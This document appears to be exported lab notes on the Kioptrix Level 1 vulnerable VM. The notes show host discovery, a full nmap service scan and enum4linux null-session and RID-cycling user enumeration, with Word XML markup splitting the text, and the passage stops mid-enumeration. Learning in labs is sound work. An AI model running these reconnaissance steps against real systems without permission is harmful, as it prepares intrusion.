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F52E62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Kioptrix Level 1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Monday, August 1, 2022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11:08 PM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SCAN HOST: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netdiscover -r 192.168.1.0/24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arp-scan -l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SCAN PORT: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nmap -A 192.168.1.4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Starting Nmap 7.92 (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https://nmap.org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) at 2022-08-01 05:14 EDT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Stats: 0:00:07 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan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Service scan Timing: About 16.67% done; ETC: 05:15 (0:00:30 remaining)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Nmap scan report for 192.168.1.4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 is up (0.0020s latency).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 shown: 994 close</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>d tcp ports (reset)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PORT          STATE SERVICE         VERSION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22/tcp        open  ssh             OpenSSH 2.9p2 (protocol 1.99)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|_sshv1: Server supports SSHv1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ssh-hostkey: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1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)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1024 8f:8e:5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)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  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)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80/tcp    open  http            Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)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|_http-server-header: Apache/1.3.20 (Un</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b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|_http-title: Test Page for the Apache Web Server on Red Hat Linux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http-methods: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  Potentially risky methods: TRACE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111/tcp   open  rpcbind         2 (RPC #100000)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rpcinfo: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program version       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> port/proto  service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100000  2                111/tcp   rpcbind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100000  2                111/udp   rpcbind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100024  1              32768/tcp   status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  100024  1              32768/udp   status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139/tcp   open  netbios-ssn Samba smbd (workgroup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: MYGROUP)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443/tcp   open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b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|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b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ssl-cert: Subject: commonName=localhost.localdomain/organiz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--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Not valid before: 2009-09-26T09:32:06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|_Not valid after:  2010-09-26T09:32:06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|_ssl-date: 2022-08-01T13:14:50+00:00; +3h59m58s from scanner time.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sslv2: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|   SSLv2 supported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cip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hers: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        SSL2_RC2_128_CBC_EXPORT40_WITH_MD5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        SSL2_RC4_128_EXPORT40_WITH_MD5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        SSL2_RC4_64_WITH_MD5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        SSL2_DES_64_CBC_WITH_MD5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        SSL2_RC2_128_CBC_WITH_MD5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        SSL2_DES_192_EDE3_CBC_WITH_MD5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        SSL2_RC4_12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>8_WITH_MD5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|_http-title: 400 Bad Request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32768/tcp open  status          1 (RPC #100024)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MAC Address: 08:00:27:60:13:70 (Oracle VirtualBox virtual NIC)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Device type: general purpose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Running: Linux 2.4.X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OS CPE: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cpe:/o:linux:linux_kernel:2.4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OS details: Linux 2.4.9 - 2.4.18 (likely embedded)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Network Distance: 1 hop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 script results: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|_clock-skew: 3h59m57s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|_smb2-time: Protocol negotiation failed (SMB2)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|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: &lt;unknown&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, NetBIOS MAC: &lt;unknown&gt; (unknown)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TRACEROUTE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HOP RTT         ADDRESS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   2.04 ms 192.168.1.4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OS and Service detection performed. Please report any incorrect results at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https://nmap.org/submit/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> .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Nmap done: 1 IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> address (1 host up) scanned in 20.38 seconds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enum4linux -a 192.168.1.4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Starting enum4linux v0.9.1 ( </w:t>
      </w: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http://labs.portcullis.co.uk/application/enum4linux/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ) on Mon Aug  1 04:53:00 20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>22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=========================================( Target Information )=========================================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Target ........... 192.168.1.4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RID Range ........ 500-550,1000-1050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Username ......... ''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Password ......... ''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Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none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============================( Enumerating Workgroup/Domain on 192.168.1.4 )============================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[+] Got domain/workgroup name: MYGROUP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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>===========( Nbtstat Information for 192.168.1.4 )================================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Looking up status of 192.168.1.4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KIOPTRIX            &lt;00&gt; -             B &lt;ACTIVE&gt;  Workstation Service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KIOPTRIX            &lt;03&gt; -             B &lt;A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CTIVE&gt;  Messenger Service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KIOPTRIX            &lt;20&gt; -             B &lt;ACTIVE&gt;  File Server Service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MYGROUP             &lt;00&gt; - &lt;GROUP&gt; B &lt;ACTIVE&gt;  Domain/Workgroup Name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MYGROUP             &lt;1e&gt; - &lt;GROUP&gt; B &lt;ACTIVE&gt;  Browser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Service Elections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MAC Address = 00-00-00-00-00-00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====================================( Session Check on 192.168.1.4 )====================================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[+] Server 192.168.1.4 allows sessions using username '', password ''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=================================( Getting domain SID for 192.168.1.4 )=================================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Domain Name: MYGROUP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Domain Sid: (NULL SID)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[+] Can't determine if host is part of domain or part of a workgroup                                   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">                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===</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>================================( OS information on 192.168.1.4 )===================================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                                                    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[E] Can't get OS info with smbclient                                                                       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[+] Got OS info for 192.168.1.4 from srvinfo:                             </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">                                             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KIOPTRIX           Wk Sv PrQ Unx NT SNT Samba Server                                                               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platform_id         :           500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os version          :       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>    4.5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server type         :           0x9a03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========================================( Users on 192.168.1.4 )========================================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                                               </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">                   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 of uninitialized value $users in print at ./enum4linux.pl line 972.                                                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 of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 975.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 of uniniti</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>alized value $users in print at ./enum4linux.pl line 986.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 of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 988.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==================================( </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Share Enumeration on 192.168.1.4 )==================================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       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Sharename           Type          Comment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---------           ----          -------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IPC$                IPC           IPC Service (Samba Server)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ADMIN$          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>    IPC           IPC Service (Samba Server)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Reconnecting with SMB1 for workgroup listing.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Server                   Comment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---------                -------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KIOPTRIX                 Samba Server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Workgroup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">                Master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---------                -------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MYGROUP        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[+] Attempting to map shares on 192.168.1.4                                                                            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[E] Can't understand response:                   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                 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NT_STATUS_NETWORK_ACCESS_DENIED listing \*                         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                    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//192.168.1.4/IPC$          Mapping: N/A Listing: N/A Writing: N/A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[E] Can't understand response:                                                                                         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tree connect failed: NT_STATUS_WRONG_PASSWORD                                                                          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//192.168.1.4/ADMIN$        Mapping: N/A Listing: N/A Writing: N/A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============================( Password Policy Information for 192.168.1.4 )============================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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">                                    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[E] Unexpected error from polenum:                                                                   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">                  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[+] Attaching to 192.168.1.4 using a NULL share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[+] Trying protocol 139/SMB...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[!] Protocol failed: SMB SessionError: 0x5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[+] Trying protocol 445/SMB...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[!] Protocol failed: [Errno Connection error (192.168.1.4:445)] [Errno </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>111] Connection refused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[+] Retieved partial password policy with rpcclient:                                                                   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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">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Password Complexity: Disabled                                                                              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Minimu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>m Password Length: 0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=======================================( Groups on 192.168.1.4 )=======================================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                                                    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[+] Getting builtin groups:                                                                                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group:[Administrators] rid:[0x220]                                                                         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group:[Users] rid:[0x221]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group:[Guests] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>rid:[0x222]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group:[Power Users] rid:[0x223]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group:[Account Operators] rid:[0x224]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group:[System Operators] rid:[0x225]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group:[Print Operators] rid:[0x226]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group:[Backup Operators] rid:[0x227]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group:[Replicator] rid:[0x228]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[+]  Getting builtin group memb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>erships:                                                                                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 Backup Operators' (RID: 551) has member: C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ouldn't find group Backup Operators                                   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 Guests' (RID: 546) has member: Couldn't find group Guests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 Power Users' (RID: 547) has member: Couldn't find group Power Users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 Administrators' (RID: 544) has member</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Couldn't find group Administrators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 Replicator' (RID: 552) has member: Couldn't find group Replicator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 Print Operators' (RID: 550) has member: Couldn't find group Print Operators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 Users' (RID: 545) has member: Couldn't find group Users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 System Operators' (RID: 549) has member: Couldn't find group System Operators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 Account Operators' (RID: 548) has member: Couldn't find group Account Operators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[+]  Getting local groups:                                                       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">                      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group:[sys] rid:[0x3ef]                                                                                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    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group:[tty] rid:[0x3f3]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group:[disk] rid:[0x3f5]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group:[mem] rid:[0x3f9]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group:[kmem] rid:[0x3fb]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group:[wheel] rid:[0x3fd]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group:[man] rid:[0x407]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group:[dip] rid:[0x439]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group:[lock] rid:[0x455]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group:[users] rid:[0x4b1]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group:[slocate]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> rid:[0x413]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group:[floppy] rid:[0x40f]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group:[utmp] rid:[0x415]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[+]  Getting local group memberships:                                                                                  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[+]  Getting domain groups:                                                               </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">             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group:[Domain Admins] rid:[0x200]                                                                               </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">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group:[Domain Users] rid:[0x201]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[+]  Getting domain group memberships:                                                                                 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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">            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 'Domain Admins' (RID: 512) has member: Couldn't find group Domain Admins                                        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 'Domain Users' (RID: 513) has member: Couldn't find group Domain Users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===================( Users on 192.168.1.4 via RID cycling (RIDS: 500-550,1000-1050) )===================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       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[I] Found new SID:                                                                                                     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S-1-5-21-4157223341-3243572438-1405127623       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                  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[+] Enumerating users using SID S-1-5-21-4157223341-3243572438-1405127623 and logon username '', password ''           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S-1-5-21-4157223341-3243572438-1405127623-502 KIOPTRIX\unix_group.2147483399 (Local Group)                             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S-1-5-21-4157223341-3243572438-1405127623-503 KIOPTRIX\unix_group.2147483399 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>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S-1-5-21-4157223341-3243572438-1405127623-504 KIOPTRIX\unix_group.2147483400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S-1-5-21-4157223341-3243572438-1405127623-505 KIOPTRIX\unix_group.2147483400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S-1-5-21-4157223341-3243572438-1405127623-506 KIOPTRIX\unix_g</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>roup.2147483401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S-1-5-21-4157223341-3243572438-1405127623-507 KIOPTRIX\unix_group.2147483401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S-1-5-21-4157223341-3243572438-1405127623-508 KIOPTRIX\unix_group.2147483402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S-1-5-21-4157223341-3243572438-1405127623-50</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>9 KIOPTRIX\unix_group.2147483402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S-1-5-21-4157223341-3243572438-1405127623-510 KIOPTRIX\unix_group.2147483403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S-1-5-21-4157223341-3243572438-1405127623-511 KIOPTRIX\unix_group.2147483403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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>438-1405127623-512 KIOPTRIX\Domain Admins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S-1-5-21-4157223341-3243572438-1405127623-513 KIOPTRIX\Domain Users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S-1-5-21-4157223341-3243572438-1405127623-514 KIOPTRIX\Domain Guests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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>127623-515 KIOPTRIX\unix_group.2147483405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S-1-5-21-4157223341-3243572438-1405127623-516 KIOPTRIX\unix_group.2147483406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S-1-5-21-4157223341-3243572438-1405127623-517 KIOPTRIX\unix_group.2147483406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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1-3243572438-1405127623-518 KIOPTRIX\unix_group.2147483407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S-1-5-21-4157223341-3243572438-1405127623-519 KIOPTRIX\unix_group.2147483407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S-1-5-21-4157223341-3243572438-1405127623-520 KIOPTRIX\unix_group.2147483408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S-1-5-21-4157223341-3243572438-1405127623-521 KIOPTRIX\unix_group.2147483408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S-1-5-21-4157223341-3243572438-1405127623-522 KIOPTRIX\unix_group.2147483409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S-1-5-21-4157223341-3243572438-1405127623-523 KIOPTRIX\unix_group.21474834</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>09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S-1-5-21-4157223341-3243572438-1405127623-524 KIOPTRIX\unix_group.2147483410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S-1-5-21-4157223341-3243572438-1405127623-525 KIOPTRIX\unix_group.2147483410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S-1-5-21-4157223341-3243572438-1405127623-526 KIOPTRIX\un</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ix_group.2147483411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S-1-5-21-4157223341-3243572438-1405127623-527 KIOPTRIX\unix_group.2147483411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S-1-5-21-4157223341-3243572438-1405127623-528 KIOPTRIX\unix_group.2147483412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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3-529 KIOPTRIX\unix_group.2147483412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S-1-5-21-4157223341-3243572438-1405127623-530 KIOPTRIX\unix_group.2147483413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S-1-5-21-4157223341-3243572438-1405127623-531 KIOPTRIX\unix_group.2147483413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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3572438-1405127623-532 KIOPTRIX\unix_group.2147483414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S-1-5-21-4157223341-3243572438-1405127623-533 KIOPTRIX\unix_group.2147483414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S-1-5-21-4157223341-3243572438-1405127623-534 KIOPTRIX\unix_group.2147483415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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>21-4157223341-3243572438-1405127623-535 KIOPTRIX\unix_group.2147483415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S-1-5-21-4157223341-3243572438-1405127623-536 KIOPTRIX\unix_group.2147483416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S-1-5-21-4157223341-3243572438-1405127623-537 KIOPTRIX\unix_group.2147483416 (Lo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>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S-1-5-21-4157223341-3243572438-1405127623-538 KIOPTRIX\unix_group.2147483417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S-1-5-21-4157223341-3243572438-1405127623-539 KIOPTRIX\unix_group.2147483417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S-1-5-21-4157223341-3243572438-1405127623-540 KIOPTRIX\unix_gro</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>up.2147483418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S-1-5-21-4157223341-3243572438-1405127623-541 KIOPTRIX\unix_group.2147483418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S-1-5-21-4157223341-3243572438-1405127623-542 KIOPTRIX\unix_group.2147483419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S-1-5-21-4157223341-3243572438-1405127623-543 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>KIOPTRIX\unix_group.2147483419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S-1-5-21-4157223341-3243572438-1405127623-544 KIOPTRIX\unix_group.2147483420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S-1-5-21-4157223341-3243572438-1405127623-545 KIOPTRIX\unix_group.2147483420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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>8-1405127623-546 KIOPTRIX\unix_group.2147483421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S-1-5-21-4157223341-3243572438-1405127623-547 KIOPTRIX\unix_group.2147483421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S-1-5-21-4157223341-3243572438-1405127623-548 KIOPTRIX\unix_group.2147483422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S-1-5-21-4157223341-3243572438-1405127623-549 KIOPTRIX\unix_group.2147483422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S-1-5-21-4157223341-3243572438-1405127623-550 KIOPTRIX\unix_group.2147483423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S-1-5-21-4157223341-3243572438-1405127623-1000 KIOPTRIX\root (Local User)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S-1-5-21-4157223341-3243572438-1405127623-1001 KIOPTRIX\root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S-1-5-21-4157223341-3243572438-1405127623-1002 KIOPTRIX\bin (Local User)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S-1-5-21-4157223341-3243572438-1405127623-1003 KIOPTRIX\bin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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5127623-1004 KIOPTRIX\daemon (Local User)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S-1-5-21-4157223341-3243572438-1405127623-1005 KIOPTRIX\daemon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S-1-5-21-4157223341-3243572438-1405127623-1006 KIOPTRIX\adm (Local User)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S-1-5-21-4157223341-3243572438-1405127623-1007 KIOPTRIX\sys (Loc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>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S-1-5-21-4157223341-3243572438-1405127623-1008 KIOPTRIX\lp (Local User)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S-1-5-21-4157223341-3243572438-1405127623-1009 KIOPTRIX\adm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S-1-5-21-4157223341-3243572438-1405127623-1010 KIOPTRIX\sync (Local User)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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2438-1405127623-1011 KIOPTRIX\tty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S-1-5-21-4157223341-3243572438-1405127623-1012 KIOPTRIX\shutdown (Local User)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S-1-5-21-4157223341-3243572438-1405127623-1013 KIOPTRIX\disk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S-1-5-21-4157223341-3243572438-1405127623-1014 KIOPTRIX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>\halt (Local User)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S-1-5-21-4157223341-3243572438-1405127623-1015 KIOPTRIX\lp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S-1-5-21-4157223341-3243572438-1405127623-1016 KIOPTRIX\mail (Local User)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S-1-5-21-4157223341-3243572438-1405127623-1017 KIOPTRIX\mem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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>341-3243572438-1405127623-1018 KIOPTRIX\news (Local User)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S-1-5-21-4157223341-3243572438-1405127623-1019 KIOPTRIX\kmem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S-1-5-21-4157223341-3243572438-1405127623-1020 KIOPTRIX\uucp (Local User)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S-1-5-21-4157223341-3243572438-1405127623-1021 KI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
